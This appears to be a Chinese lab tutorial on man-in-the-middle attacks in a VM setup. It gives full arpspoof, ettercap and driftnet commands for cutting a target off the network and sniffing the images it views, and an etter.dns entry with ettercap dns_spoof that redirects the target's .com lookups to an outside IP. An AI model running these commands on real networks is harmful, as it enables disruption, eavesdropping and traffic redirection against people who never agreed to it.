我不会RAP,但我会ARP——老欢

环境:

  1. 攻击机:kali linux (ip地址:192.168.204.128)
  2. 靶机:windows server 2003(IP地址:192.168.204.132)

以上均是虚拟机环境,网络模式为NAT模式

检验虚拟机之间的网络是否连通

7b4fa0680b9ce416de0461d3de7790c1.png

ARP断网攻击

在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2

命令解释:

-i 指定网卡

-t 指定目标ip

这里的192.168.204.2是网关

b0888f250ea88eb2e667e8d0c043a1e7.png

欺骗开始,我们来看看靶机,靶机已经无法上网,无法访问百度了。

a406e80beebafe68edb732df4b8d07be.png

接下来我们按ctrl+c停止arp欺骗,靶机又能上网了

0062f86f57477cd1d1719096e98f8496.png

2.捕获靶机浏览的图片

在终端输入命令:ettercap -i eth0 -Tq -M arp:remote /192.168.204.132// /192.168.204.2//

eth0是网卡

192.168.204.132是靶机地址

192.168.204.2是网关地址

bab0f9e68242b15a4bc9faefbb89236d.png

开启图片嗅探 driftnet -i eth0 -a -d /root/pictures
这里将嗅探到的图片存到root目录下的pictures文件夹里

接下来我们在靶机上面随便浏览一些图片,然后我们打开kali机的pictures文件夹,所有的图片已经被抓取到,所以少看不该看的图片!

63c1fe0fa767e3a8273d28afe193cedf.png

3.DNS欺骗

首先执行命令leafpad /etc/ettercap/etter.dns

在这个文件里加上这么一句 *.*.com A 39.108.146.75(这里的ip地址是403工作室的ip)

da34c46714c581608978b46c95549a7c.png

执行命令 ettercap -i eth0 -Tq -P dns_spoof /192.168.204.132// /192.168.204.2//

5bd6948e51b835a020b13c509d8328f6.png

回到靶机,在url上输人http://www.163.com来访问一下网易

f003f252d9a09e7fcd1ce9eb9462c188.png

当我回车访问那一刻,它跳转到了403工作室

db7f9004efbd3655fb6bfac6bb7fdff9.png

经过试验,这里的dns欺骗对一些大型网站不起作用,可能是做了防dns欺骗的措施

本文仅供测试娱乐,请勿用于实际环境。

中间人攻击之ARP欺骗 - 403工作室​laohuan.art
090db8ee64b3050ded9b7ed003212662.png
GitHub 加速计划 / li / linux-dash
13
2
下载
A beautiful web dashboard for Linux
最近提交(Master分支:3 个月前 )
186a802e added ecosystem file for PM2 5 年前
5def40a3 Add host customization support for the NodeJS version 5 年前
Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐